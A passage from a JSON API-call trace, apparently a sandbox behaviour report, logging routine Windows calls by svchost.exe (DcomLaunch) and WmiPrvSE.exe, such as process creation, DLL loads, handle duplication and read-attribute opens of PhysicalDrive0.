          },
          {
            "timestamp": "2025-11-20 10:58:31,557",
            "thread_id": "912",
            "caller": "0x7ffee10e89f3",
            "parentcaller": "0x7ffee167de30",
            "category": "process",
            "api": "CreateProcessInternalW",
            "status": true,
            "return": "0x00000001",
            "arguments": [
              {
                "name": "ApplicationName",
                "value": "C:\\Windows\\system32\\wbem\\wmiprvse.exe"
              },
              {
                "name": "CommandLine",
                "value": "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding"
              },
              {
                "name": "CreationFlags",
                "value": "0x00000010",
                "pretty_value": "CREATE_NEW_CONSOLE"
              },
              {
                "name": "ProcessId",
                "value": "3164"
              },
              {
                "name": "ThreadId",
                "value": "1388"
              },
              {
                "name": "ProcessHandle",
                "value": "0x00000e5c"
              },
              {
                "name": "ThreadHandle",
                "value": "0x00000eb4"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 2
          },
          {
            "timestamp": "2025-11-20 10:58:35,698",
            "thread_id": "912",
            "caller": "0x7ffee10c56b2",
            "parentcaller": "0x7ffee10be6a1",
            "category": "system",
            "api": "LdrLoadDll",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Flags",
                "value": "0x00000000"
              },
              {
                "name": "FileName",
                "value": "C:\\Windows\\System32\\rsaenh.dll"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffedfb90000"
              }
            ],
            "repeated": 0,
            "id": 3
          },
          {
            "timestamp": "2025-11-20 10:58:35,932",
            "thread_id": "2872",
            "caller": "0x7ffee10f6f4c",
            "parentcaller": "0x7ffede9ab182",
            "category": "system",
            "api": "NtDuplicateObject",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "SourceProcessHandle",
                "value": "0x00000f00"
              },
              {
                "name": "SourceHandle",
                "value": "0x000007ec"
              },
              {
                "name": "TargetProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "TargetHandle",
                "value": "0x00000dc4"
              },
              {
                "name": "Options",
                "value": "0x00000002"
              }
            ],
            "repeated": 0,
            "id": 4
          },
          {
            "timestamp": "2025-11-20 10:58:35,932",
            "thread_id": "2872",
            "caller": "0x7ffee10f6f4c",
            "parentcaller": "0x7ffede9ab182",
            "category": "system",
            "api": "NtDuplicateObject",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "SourceProcessHandle",
                "value": "0x00000ea8"
              },
              {
                "name": "SourceHandle",
                "value": "0x000007ec"
              },
              {
                "name": "TargetProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "TargetHandle",
                "value": "0x00000dc4"
              },
              {
                "name": "Options",
                "value": "0x00000002"
              }
            ],
            "repeated": 0,
            "id": 5
          },
          {
            "timestamp": "2025-11-20 10:58:37,839",
            "thread_id": "2872",
            "caller": "0x7ffee10f6f4c",
            "parentcaller": "0x7ffede9abe00",
            "category": "system",
            "api": "NtDuplicateObject",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "SourceProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "SourceHandle",
                "value": "0x00000dc4"
              },
              {
                "name": "TargetProcessHandle",
                "value": "0x00000f00"
              },
              {
                "name": "TargetHandle",
                "value": "0x00000dc4"
              },
              {
                "name": "Options",
                "value": "0x00000003"
              }
            ],
            "repeated": 0,
            "id": 6
          },
          {
            "timestamp": "2025-11-20 10:58:40,636",
            "thread_id": "2872",
            "caller": "0x7ffee10c6579",
            "parentcaller": "0x7ffee10c5fe6",
            "category": "filesystem",
            "api": "NtCreateFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x00000f18"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00100080",
                "pretty_value": "FILE_READ_ATTRIBUTES|SYNCHRONIZE"
              },
              {
                "name": "FileName",
                "value": "\\??\\PhysicalDrive0"
              },
              {
                "name": "CreateDisposition",
                "value": "1",
                "pretty_value": "FILE_OPEN"
              },
              {
                "name": "ShareAccess",
                "value": "3",
                "pretty_value": "FILE_SHARE_READ|FILE_SHARE_WRITE"
              },
              {
                "name": "FileAttributes",
                "value": "0x00000000"
              },
              {
                "name": "ExistedBefore",
                "value": "yes"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 1,
            "id": 7
          },
          {
            "timestamp": "2025-11-20 10:59:00,011",
            "thread_id": "2872",
            "caller": "0x7ffee10f6f4c",
            "parentcaller": "0x7ffede9ab182",
            "category": "system",
            "api": "NtDuplicateObject",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "SourceProcessHandle",
                "value": "0x00000dc4"
              },
              {
                "name": "SourceHandle",
                "value": "0x000007ec"
              },
              {
                "name": "TargetProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "TargetHandle",
                "value": "0x00000f00"
              },
              {
                "name": "Options",
                "value": "0x00000002"
              }
            ],
            "repeated": 0,
            "id": 8
          },
          {
            "timestamp": "2025-11-20 10:59:00,011",
            "thread_id": "2872",
            "caller": "0x7ffee10f6f4c",
            "parentcaller": "0x7ffede9ab182",
            "category": "system",
            "api": "NtDuplicateObject",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "SourceProcessHandle",
                "value": "0x00000ea8"
              },
              {
                "name": "SourceHandle",
                "value": "0x000007ec"
              },
              {
                "name": "TargetProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "TargetHandle",
                "value": "0x00000f00"
              },
              {
                "name": "Options",
                "value": "0x00000002"
              }
            ],
            "repeated": 0,
            "id": 9
          },
          {
            "timestamp": "2025-11-20 10:59:00,651",
            "thread_id": "2872",
            "caller": "0x7ffee10c6579",
            "parentcaller": "0x7ffee10c5fe6",
            "category": "filesystem",
            "api": "NtCreateFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x00000dc4"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00100080",
                "pretty_value": "FILE_READ_ATTRIBUTES|SYNCHRONIZE"
              },
              {
                "name": "FileName",
                "value": "\\??\\PhysicalDrive0"
              },
              {
                "name": "CreateDisposition",
                "value": "1",
                "pretty_value": "FILE_OPEN"
              },
              {
                "name": "ShareAccess",
                "value": "3",
                "pretty_value": "FILE_SHARE_READ|FILE_SHARE_WRITE"
              },
              {
                "name": "FileAttributes",
                "value": "0x00000000"
              },
              {
                "name": "ExistedBefore",
                "value": "yes"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 10
          },
          {
            "timestamp": "2025-11-20 10:59:10,636",
            "thread_id": "2872",
            "caller": "0x7ffee10c6579",
            "parentcaller": "0x7ffee10c5fe6",
            "category": "filesystem",
            "api": "NtCreateFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x00000eb0"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00100080",
                "pretty_value": "FILE_READ_ATTRIBUTES|SYNCHRONIZE"
              },
              {
                "name": "FileName",
                "value": "\\??\\PhysicalDrive0"
              },
              {
                "name": "CreateDisposition",
                "value": "1",
                "pretty_value": "FILE_OPEN"
              },
              {
                "name": "ShareAccess",
                "value": "3",
                "pretty_value": "FILE_SHARE_READ|FILE_SHARE_WRITE"
              },
              {
                "name": "FileAttributes",
                "value": "0x00000000"
              },
              {
                "name": "ExistedBefore",
                "value": "yes"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 11
          },
          {
            "timestamp": "2025-11-20 10:59:20,636",
            "thread_id": "324",
            "caller": "0x7ffee10c6579",
            "parentcaller": "0x7ffee10c5fe6",
            "category": "filesystem",
            "api": "NtCreateFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x00000a5c"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00100080",
                "pretty_value": "FILE_READ_ATTRIBUTES|SYNCHRONIZE"
              },
              {
                "name": "FileName",
                "value": "\\??\\PhysicalDrive0"
              },
              {
                "name": "CreateDisposition",
                "value": "1",
                "pretty_value": "FILE_OPEN"
              },
              {
                "name": "ShareAccess",
                "value": "3",
                "pretty_value": "FILE_SHARE_READ|FILE_SHARE_WRITE"
              },
              {
                "name": "FileAttributes",
                "value": "0x00000000"
              },
              {
                "name": "ExistedBefore",
                "value": "yes"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 12
          },
          {
            "timestamp": "2025-11-20 10:59:30,636",
            "thread_id": "324",
            "caller": "0x7ffee10c6579",
            "parentcaller": "0x7ffee10c5fe6",
            "category": "filesystem",
            "api": "NtCreateFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x00000f14"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00100080",
                "pretty_value": "FILE_READ_ATTRIBUTES|SYNCHRONIZE"
              },
              {
                "name": "FileName",
                "value": "\\??\\PhysicalDrive0"
              },
              {
                "name": "CreateDisposition",
                "value": "1",
                "pretty_value": "FILE_OPEN"
              },
              {
                "name": "ShareAccess",
                "value": "3",
                "pretty_value": "FILE_SHARE_READ|FILE_SHARE_WRITE"
              },
              {
                "name": "FileAttributes",
                "value": "0x00000000"
              },
              {
                "name": "ExistedBefore",
                "value": "yes"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 13
          },
          {
            "timestamp": "2025-11-20 10:59:40,636",
            "thread_id": "2872",
            "caller": "0x7ffee10c6579",
            "parentcaller": "0x7ffee10c5fe6",
            "category": "filesystem",
            "api": "NtCreateFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x00000f08"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00100080",
                "pretty_value": "FILE_READ_ATTRIBUTES|SYNCHRONIZE"
              },
              {
                "name": "FileName",
                "value": "\\??\\PhysicalDrive0"
              },
              {
                "name": "CreateDisposition",
                "value": "1",
                "pretty_value": "FILE_OPEN"
              },
              {
                "name": "ShareAccess",
                "value": "3",
                "pretty_value": "FILE_SHARE_READ|FILE_SHARE_WRITE"
              },
              {
                "name": "FileAttributes",
                "value": "0x00000000"
              },
              {
                "name": "ExistedBefore",
                "value": "yes"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 1,
            "id": 14
          },
          {
            "timestamp": "2025-11-20 11:00:00,011",
            "thread_id": "324",
            "caller": "0x7ffee10f6f4c",
            "parentcaller": "0x7ffede9ab182",
            "category": "system",
            "api": "NtDuplicateObject",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "SourceProcessHandle",
                "value": "0x00000f14"
              },
              {
                "name": "SourceHandle",
                "value": "0x00000500"
              },
              {
                "name": "TargetProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "TargetHandle",
                "value": "0x00000a5c"
              },
              {
                "name": "Options",
                "value": "0x00000002"
              }
            ],
            "repeated": 0,
            "id": 15
          },
          {
            "timestamp": "2025-11-20 11:00:00,011",
            "thread_id": "324",
            "caller": "0x7ffee10f6f4c",
            "parentcaller": "0x7ffede9ab182",
            "category": "system",
            "api": "NtDuplicateObject",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "SourceProcessHandle",
                "value": "0x00000f0c"
              },
              {
                "name": "SourceHandle",
                "value": "0x00000500"
              },
              {
                "name": "TargetProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "TargetHandle",
                "value": "0x00000a5c"
              },
              {
                "name": "Options",
                "value": "0x00000002"
              }
            ],
            "repeated": 0,
            "id": 16
          },
          {
            "timestamp": "2025-11-20 11:00:00,651",
            "thread_id": "324",
            "caller": "0x7ffee10c6579",
            "parentcaller": "0x7ffee10c5fe6",
            "category": "filesystem",
            "api": "NtCreateFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x00000e94"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00100080",
                "pretty_value": "FILE_READ_ATTRIBUTES|SYNCHRONIZE"
              },
              {
                "name": "FileName",
                "value": "\\??\\PhysicalDrive0"
              },
              {
                "name": "CreateDisposition",
                "value": "1",
                "pretty_value": "FILE_OPEN"
              },
              {
                "name": "ShareAccess",
                "value": "3",
                "pretty_value": "FILE_SHARE_READ|FILE_SHARE_WRITE"
              },
              {
                "name": "FileAttributes",
                "value": "0x00000000"
              },
              {
                "name": "ExistedBefore",
                "value": "yes"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 17
          },
          {
            "timestamp": "2025-11-20 11:00:10,636",
            "thread_id": "2872",
            "caller": "0x7ffee10c6579",
            "parentcaller": "0x7ffee10c5fe6",
            "category": "filesystem",
            "api": "NtCreateFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x0000083c"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00100080",
                "pretty_value": "FILE_READ_ATTRIBUTES|SYNCHRONIZE"
              },
              {
                "name": "FileName",
                "value": "\\??\\PhysicalDrive0"
              },
              {
                "name": "CreateDisposition",
                "value": "1",
                "pretty_value": "FILE_OPEN"
              },
              {
                "name": "ShareAccess",
                "value": "3",
                "pretty_value": "FILE_SHARE_READ|FILE_SHARE_WRITE"
              },
              {
                "name": "FileAttributes",
                "value": "0x00000000"
              },
              {
                "name": "ExistedBefore",
                "value": "yes"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 18
          },
          {
            "timestamp": "2025-11-20 11:00:20,651",
            "thread_id": "2872",
            "caller": "0x7ffee10c6579",
            "parentcaller": "0x7ffee10c5fe6",
            "category": "filesystem",
            "api": "NtCreateFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x000008b8"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00100080",
                "pretty_value": "FILE_READ_ATTRIBUTES|SYNCHRONIZE"
              },
              {
                "name": "FileName",
                "value": "\\??\\PhysicalDrive0"
              },
              {
                "name": "CreateDisposition",
                "value": "1",
                "pretty_value": "FILE_OPEN"
              },
              {
                "name": "ShareAccess",
                "value": "3",
                "pretty_value": "FILE_SHARE_READ|FILE_SHARE_WRITE"
              },
              {
                "name": "FileAttributes",
                "value": "0x00000000"
              },
              {
                "name": "ExistedBefore",
                "value": "yes"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 19
          },
          {
            "timestamp": "2025-11-20 11:00:30,651",
            "thread_id": "4640",
            "caller": "0x7ffee10c6579",
            "parentcaller": "0x7ffee10c5fe6",
            "category": "filesystem",
            "api": "NtCreateFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x00000f10"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00100080",
                "pretty_value": "FILE_READ_ATTRIBUTES|SYNCHRONIZE"
              },
              {
                "name": "FileName",
                "value": "\\??\\PhysicalDrive0"
              },
              {
                "name": "CreateDisposition",
                "value": "1",
                "pretty_value": "FILE_OPEN"
              },
              {
                "name": "ShareAccess",
                "value": "3",
                "pretty_value": "FILE_SHARE_READ|FILE_SHARE_WRITE"
              },
              {
                "name": "FileAttributes",
                "value": "0x00000000"
              },
              {
                "name": "ExistedBefore",
                "value": "yes"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 2,
            "id": 20
          },
          {
            "timestamp": "2025-11-20 11:01:00,011",
            "thread_id": "4640",
            "caller": "0x7ffee10f6f4c",
            "parentcaller": "0x7ffee336ef53",
            "category": "system",
            "api": "NtDuplicateObject",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "SourceProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "SourceHandle",
                "value": "0xfffffffe"
              },
              {
                "name": "TargetProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "TargetHandle",
                "value": "0x000008b8"
              },
              {
                "name": "Options",
                "value": "0x00000002"
              }
            ],
            "repeated": 0,
            "id": 21
          },
          {
            "timestamp": "2025-11-20 11:01:00,011",
            "thread_id": "324",
            "caller": "0x7ffee10f6f4c",
            "parentcaller": "0x7ffede9ab182",
            "category": "system",
            "api": "NtDuplicateObject",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "SourceProcessHandle",
                "value": "0x00000ab8"
              },
              {
                "name": "SourceHandle",
                "value": "0x000006e8"
              },
              {
                "name": "TargetProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "TargetHandle",
                "value": "0x0000083c"
              },
              {
                "name": "Options",
                "value": "0x00000002"
              }
            ],
            "repeated": 0,
            "id": 22
          },
          {
            "timestamp": "2025-11-20 11:01:00,011",
            "thread_id": "324",
            "caller": "0x7ffee10f6f4c",
            "parentcaller": "0x7ffede9ab182",
            "category": "system",
            "api": "NtDuplicateObject",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "SourceProcessHandle",
                "value": "0x00000f08"
              },
              {
                "name": "SourceHandle",
                "value": "0x000006e8"
              },
              {
                "name": "TargetProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "TargetHandle",
                "value": "0x0000083c"
              },
              {
                "name": "Options",
                "value": "0x00000002"
              }
            ],
            "repeated": 0,
            "id": 23
          },
          {
            "timestamp": "2025-11-20 11:01:00,636",
            "thread_id": "324",
            "caller": "0x7ffee10c6579",
            "parentcaller": "0x7ffee10c5fe6",
            "category": "filesystem",
            "api": "NtCreateFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x00000e5c"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00100080",
                "pretty_value": "FILE_READ_ATTRIBUTES|SYNCHRONIZE"
              },
              {
                "name": "FileName",
                "value": "\\??\\PhysicalDrive0"
              },
              {
                "name": "CreateDisposition",
                "value": "1",
                "pretty_value": "FILE_OPEN"
              },
              {
                "name": "ShareAccess",
                "value": "3",
                "pretty_value": "FILE_SHARE_READ|FILE_SHARE_WRITE"
              },
              {
                "name": "FileAttributes",
                "value": "0x00000000"
              },
              {
                "name": "ExistedBefore",
                "value": "yes"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 24
          },
          {
            "timestamp": "2025-11-20 11:01:10,636",
            "thread_id": "324",
            "caller": "0x7ffee10c6579",
            "parentcaller": "0x7ffee10c5fe6",
            "category": "filesystem",
            "api": "NtCreateFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x00000ab8"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00100080",
                "pretty_value": "FILE_READ_ATTRIBUTES|SYNCHRONIZE"
              },
              {
                "name": "FileName",
                "value": "\\??\\PhysicalDrive0"
              },
              {
                "name": "CreateDisposition",
                "value": "1",
                "pretty_value": "FILE_OPEN"
              },
              {
                "name": "ShareAccess",
                "value": "3",
                "pretty_value": "FILE_SHARE_READ|FILE_SHARE_WRITE"
              },
              {
                "name": "FileAttributes",
                "value": "0x00000000"
              },
              {
                "name": "ExistedBefore",
                "value": "yes"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 25
          },
          {
            "timestamp": "2025-11-20 11:01:20,636",
            "thread_id": "324",
            "caller": "0x7ffee10c6579",
            "parentcaller": "0x7ffee10c5fe6",
            "category": "filesystem",
            "api": "NtCreateFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x00000e5c"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00100080",
                "pretty_value": "FILE_READ_ATTRIBUTES|SYNCHRONIZE"
              },
              {
                "name": "FileName",
                "value": "\\??\\PhysicalDrive0"
              },
              {
                "name": "CreateDisposition",
                "value": "1",
                "pretty_value": "FILE_OPEN"
              },
              {
                "name": "ShareAccess",
                "value": "3",
                "pretty_value": "FILE_SHARE_READ|FILE_SHARE_WRITE"
              },
              {
                "name": "FileAttributes",
                "value": "0x00000000"
              },
              {
                "name": "ExistedBefore",
                "value": "yes"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 26
          },
          {
            "timestamp": "2025-11-20 11:01:30,651",
            "thread_id": "2872",
            "caller": "0x7ffee10c6579",
            "parentcaller": "0x7ffee10c5fe6",
            "category": "filesystem",
            "api": "NtCreateFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x000008bc"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00100080",
                "pretty_value": "FILE_READ_ATTRIBUTES|SYNCHRONIZE"
              },
              {
                "name": "FileName",
                "value": "\\??\\PhysicalDrive0"
              },
              {
                "name": "CreateDisposition",
                "value": "1",
                "pretty_value": "FILE_OPEN"
              },
              {
                "name": "ShareAccess",
                "value": "3",
                "pretty_value": "FILE_SHARE_READ|FILE_SHARE_WRITE"
              },
              {
                "name": "FileAttributes",
                "value": "0x00000000"
              },
              {
                "name": "ExistedBefore",
                "value": "yes"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 1,
            "id": 27
          }
        ],
        "threads": [
          "912",
          "324",
          "2872",
          "4640"
        ],
        "environ": {
          "UserName": "СИСТЕМА",
          "ComputerName": "HOME-PC",
          "WindowsPath": "C:\\Windows",
          "TempPath": "C:\\Temp\\",
          "CommandLine": "C:\\Windows\\system32\\svchost.exe -k DcomLaunch -p",
          "RegisteredOwner": "",
          "RegisteredOrganization": "",
          "ProductName": "",
          "SystemVolumeSerialNumber": "a0c0-2cc3",
          "SystemVolumeGUID": "2d3f192c-0000-0000-0000-300300000000",
          "MachineGUID": "",
          "MainExeBase": "0x7ff630560000",
          "MainExeSize": "0x00010000",
          "Bitness": "64-bit"
        },
        "file_activities": {
          "read_files": [],
          "write_files": [],
          "delete_files": []
        }
      },
      {
        "process_id": 3164,
        "process_name": "WmiPrvSE.exe",
        "parent_id": 740,
        "module_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe",
        "first_seen": "2025-11-20 10:58:31,585",
        "calls": [
          {
            "timestamp": "2025-11-20 10:58:31,632",
            "thread_id": "3424",
            "caller": "0x7ffee347e715",
            "parentcaller": "0x7ffee347e37b",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x21e2b9cc000"
              },
              {
                "name": "RegionSize",
                "value": "0x00001000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 0
          },
          {
            "timestamp": "2025-11-20 10:58:31,632",
            "thread_id": "1388",
            "caller": "0x7ff79aafca74",
            "parentcaller": "0x7ff79aafc74d",
            "category": "system",
            "api": "LdrLoadDll",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Flags",
                "value": "0x00000000"
              },
              {
                "name": "FileName",
                "value": "kernel32.dll"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffee1660000"
              }
            ],
            "repeated": 0,
            "id": 1
          },
          {
            "timestamp": "2025-11-20 10:58:31,632",
            "thread_id": "1260",
            "caller": "0x7ffee347e715",
            "parentcaller": "0x7ffee347e37b",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x21e2c0f6000"
              },
              {
                "name": "RegionSize",
                "value": "0x00001000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 2
          },
          {
            "timestamp": "2025-11-20 10:58:31,632",
            "thread_id": "1388",
            "caller": "0x7ff79aafca74",
            "parentcaller": "0x7ff79aafc74d",
            "category": "filesystem",
            "api": "NtCreateFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x000001f4"
              },
              {
                "name": "DesiredAccess",
                "value": "0x80100080",
                "pretty_value": "GENERIC_READ|FILE_READ_ATTRIBUTES|SYNCHRONIZE"
              },
              {
                "name": "FileName",
                "value": "C:\\Windows\\Globalization\\Sorting\\sortdefault.nls"
              },
              {
                "name": "CreateDisposition",
                "value": "1",
                "pretty_value": "FILE_OPEN"
              },
              {
                "name": "ShareAccess",
                "value": "1",
                "pretty_value": "FILE_SHARE_READ"
              },
              {
                "name": "FileAttributes",
                "value": "0x00000080",
                "pretty_value": "FILE_ATTRIBUTE_NORMAL"
              },
              {
                "name": "ExistedBefore",
                "value": "yes"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 3
          },
          {
            "timestamp": "2025-11-20 10:58:31,632",
            "thread_id": "1388",
            "caller": "0x7ff79aafca74",
            "parentcaller": "0x7ff79aafc74d",
            "category": "process",
            "api": "NtMapViewOfSection",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "SectionHandle",
                "value": "0x000001f8"
              },
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x21e2d8d0000"
              },
              {
                "name": "SectionOffset",
                "value": "0x3f67acf000"
              },
              {
                "name": "ViewSize",
                "value": "0x00338000"
              },
              {
                "name": "Win32Protect",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 4
          },
          {
            "timestamp": "2025-11-20 10:58:31,632",
            "thread_id": "1388",
            "caller": "0x7ff79aafc96b",
            "parentcaller": "0x7ff79aafc762",
            "category": "filesystem",
            "api": "NtOpenFile",
            "status": false,
            "return": "0xffffffffc0000034",
            "pretty_return": "OBJECT_NAME_NOT_FOUND",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x00000000"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00100001",
                "pretty_value": "FILE_READ_ACCESS|SYNCHRONIZE"
              },
              {
                "name": "FileName",
                "value": "C:\\Windows\\SystemResources\\USER32.dll.mun"
              },
              {
                "name": "ShareAccess",
                "value": "5",
                "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE"
              }
            ],
            "repeated": 0,
            "id": 5
          },
          {
            "timestamp": "2025-11-20 10:58:31,632",
            "thread_id": "1388",
            "caller": "0x7ff79aafc96b",
            "parentcaller": "0x7ff79aafc762",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x21e2b9cd000"
              },
              {
                "name": "RegionSize",
                "value": "0x00002000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 6
          },
          {
            "timestamp": "2025-11-20 10:58:31,632",
            "thread_id": "1388",
            "caller": "0x7ff79aafc99f",
            "parentcaller": "0x7ff79aafc762",
            "category": "filesystem",
            "api": "NtOpenFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x000001fc"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00100001",
                "pretty_value": "FILE_READ_ACCESS|SYNCHRONIZE"
              },
              {
                "name": "FileName",
                "value": "C:\\Windows\\System32\\ru-RU\\USER32.dll.mui"
              },
              {
                "name": "ShareAccess",
                "value": "5",
                "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE"
              }
            ],
            "repeated": 0,
            "id": 7
          },
          {
            "timestamp": "2025-11-20 10:58:31,632",
            "thread_id": "1388",
            "caller": "0x7ff79aafc99f",
            "parentcaller": "0x7ff79aafc762",
            "category": "process",
            "api": "NtMapViewOfSection",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "SectionHandle",
                "value": "0x00000200"
              },
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x21e2c030000"
              },
              {
                "name": "SectionOffset",
                "value": "0x3f67ace480"
              },
              {
                "name": "ViewSize",
                "value": "0x00005000"
              },
              {
                "name": "Win32Protect",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 8
          },
          {
            "timestamp": "2025-11-20 10:58:31,632",
            "thread_id": "1388",
            "caller": "0x7ff79aafc378",
            "parentcaller": "0x7ff79aafb501",
            "category": "filesystem",
            "api": "NtOpenFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x00000200"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00100001",
                "pretty_value": "FILE_READ_ACCESS|SYNCHRONIZE"
              },
              {
                "name": "FileName",
                "value": "C:\\Windows\\System32\\rpcss.dll"
              },
              {
                "name": "ShareAccess",
                "value": "5",
                "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE"
              }
            ],
            "repeated": 0,
            "id": 9
          },
          {
            "timestamp": "2025-11-20 10:58:31,632",
            "thread_id": "1388",
            "caller": "0x7ff79aafc378",
